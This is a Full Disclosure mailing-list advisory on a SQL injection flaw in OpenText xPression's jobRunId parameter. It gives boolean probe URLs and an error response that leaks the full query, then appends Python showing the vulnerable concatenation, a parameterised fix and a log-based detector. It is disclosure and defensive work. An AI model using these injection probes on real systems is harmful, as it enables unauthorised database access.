Message-ID: <CAGOhvvKd_EW9vf4ypRUkBGb-QsdnO=Po=goSwXSuOnWXFFw6BA@mail.gmail.com>
Date: Fri, 6 Oct 2017 09:13:33 +0200
From: Marcin Wołoszyn <mw@....pl>
To: fulldisclosure@...lists.org
Subject: [FD] OpenText Document Sciences xPression (formerly EMC Document
 Sciences xPression) - SQL Injection

(This is a re-submission of the corrected advisory, due to accidental CVE-ID swapping in the original post)


Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14757

Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)

Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)

SQL Injection:
==============

Due to the lack of prepared statements, the application is prone to SQL
injection attacks.
A potential attacker can retrieve data from the application database by
exploiting the issue.

Vector:
-------

True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2

Additionally:

http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa

results in the following error in the response:

HTTP/1.1 200 OK
[...]
  <b>Errors:&nbsp;</b>

  See nested exception&#x3b; nested exception is&#x3a;
java.lang.RuntimeException&#x3a;
com.dsc.uniarch.cr.error.CRException&#x3a; CRReportingSL&#x3a; Method
getJobRunsByIds did not succeed because of a database operation
failure.&#x3b;
&#x9;---&gt; nested com.dsc.uniarch.cr.error.CRSyntaxException&#x3a;
Database syntax error &#x3a;SELECT  JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
FROM T_JOBRUN WHERE
JOBRUN_ID&#x3d;1502642747222443244706554841153aaa.&#x3b;
&#x9;---&gt; nested java.sql.SQLSyntaxErrorException&#x3a;
ORA-00933&#x3a; SQL command not properly ended

An attacker can see the whole query and the injection point. This can also be
used for error-based data extraction.
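The two behaviours above (the boolean "and 1=1" / "and 1=2" oracle, and the database syntax error leaking the full query) both follow from one root cause: the jobRunId request parameter is concatenated into the SQL text. The following added example, which is not part of the advisory and not OpenText's code, reproduces that pattern against a constructed in-memory SQLite table named after the T_JOBRUN columns shown in the error, places the hardened form (input validation plus a bound parameter) beside it, and adds a small detection helper that flags access-log requests to the downloadSupportFile action whose jobRunId is not a plain decimal integer. The sample rows and log lines are constructed; SQLite stands in for the product's Oracle backend, so the exact error text differs from ORA-00933.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the application's T_JOBRUN table. The column names
# come from the query shown in the advisory; the rows are made up.
SAMPLE_ROWS = [
    (1001, "monthly-statements", "COMPLETED"),
    (1002, "welcome-letters", "FAILED"),
    (1003, "policy-renewals", "COMPLETED"),
]

JOBRUN_ID_RE = re.compile(r"[0-9]+")  # the only shape a jobRunId should ever have


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database with a minimal T_JOBRUN (Oracle in the real product)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE T_JOBRUN (JOBRUN_ID INTEGER PRIMARY KEY, JOB_NAME TEXT, STATUS TEXT)"
    )
    conn.executemany("INSERT INTO T_JOBRUN VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def get_job_run_vulnerable(conn: sqlite3.Connection, job_run_id: str) -> list:
    """The flawed pattern: the request parameter is glued into the SQL text, so
    whatever follows the number is parsed by the database as SQL."""
    sql = "SELECT JOBRUN_ID, JOB_NAME, STATUS FROM T_JOBRUN WHERE JOBRUN_ID=" + job_run_id
    return conn.execute(sql).fetchall()


def get_job_run_safe(conn: sqlite3.Connection, job_run_id: str) -> list:
    """Hardened form: reject anything that is not a decimal integer, then bind the
    value as a parameter so the database never sees it as SQL syntax."""
    if not JOBRUN_ID_RE.fullmatch(job_run_id):
        raise ValueError("jobRunId must be a decimal integer")
    sql = "SELECT JOBRUN_ID, JOB_NAME, STATUS FROM T_JOBRUN WHERE JOBRUN_ID=?"
    return conn.execute(sql, (int(job_run_id),)).fetchall()


def probe(fn, conn: sqlite3.Connection, value: str) -> str:
    """Summarise what a caller observes for one input: a row count, a database-side
    syntax error (the ORA-00933 case in the advisory), or rejection before any query runs."""
    try:
        rows = fn(conn, value)
    except sqlite3.OperationalError as exc:
        return f"db-error: {exc}"
    except ValueError as exc:
        return f"rejected: {exc}"
    return f"{len(rows)} row(s)"


REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_suspicious_job_run_ids(log_lines: list) -> list:
    """Detection side: return (client, jobRunId) for every request to the
    downloadSupportFile action whose jobRunId is not a plain decimal integer."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/downloadSupportFile.action"):
            continue
        for value in parse_qs(url.query).get("jobRunId", []):  # '+' decodes to a space
            if not JOBRUN_ID_RE.fullmatch(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed access-log lines; the first and third reuse the advisory's probe values.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Oct/2017:09:13:33 +0200] "GET /xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [06/Oct/2017:09:14:01 +0200] "GET /xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153 HTTP/1.1" 200 9811',
    '10.0.0.5 - - [06/Oct/2017:09:14:20 +0200] "GET /xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa HTTP/1.1" 200 3410',
]

if __name__ == "__main__":
    db = make_db()
    for value in ("1001 and 1=1", "1001 and 1=2", "1001aaa"):
        print(f"vulnerable {value!r:>16}: {probe(get_job_run_vulnerable, db, value)}")
        print(f"safe       {value!r:>16}: {probe(get_job_run_safe, db, value)}")
    print("flagged:", flag_suspicious_job_run_ids(SAMPLE_LOG))
```

The validation step in get_job_run_safe is what removes the error-message channel as well: a malformed id is rejected in application code before any statement is sent, so the database never produces the syntax error that, in the advisory, echoed the whole SELECT back to the client. The parameter binding is the actual fix for the injection; the regex is defence in depth and a convenient signal for the log check.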

Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774

Contact:
========
mw[at]nme[dot]pl

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
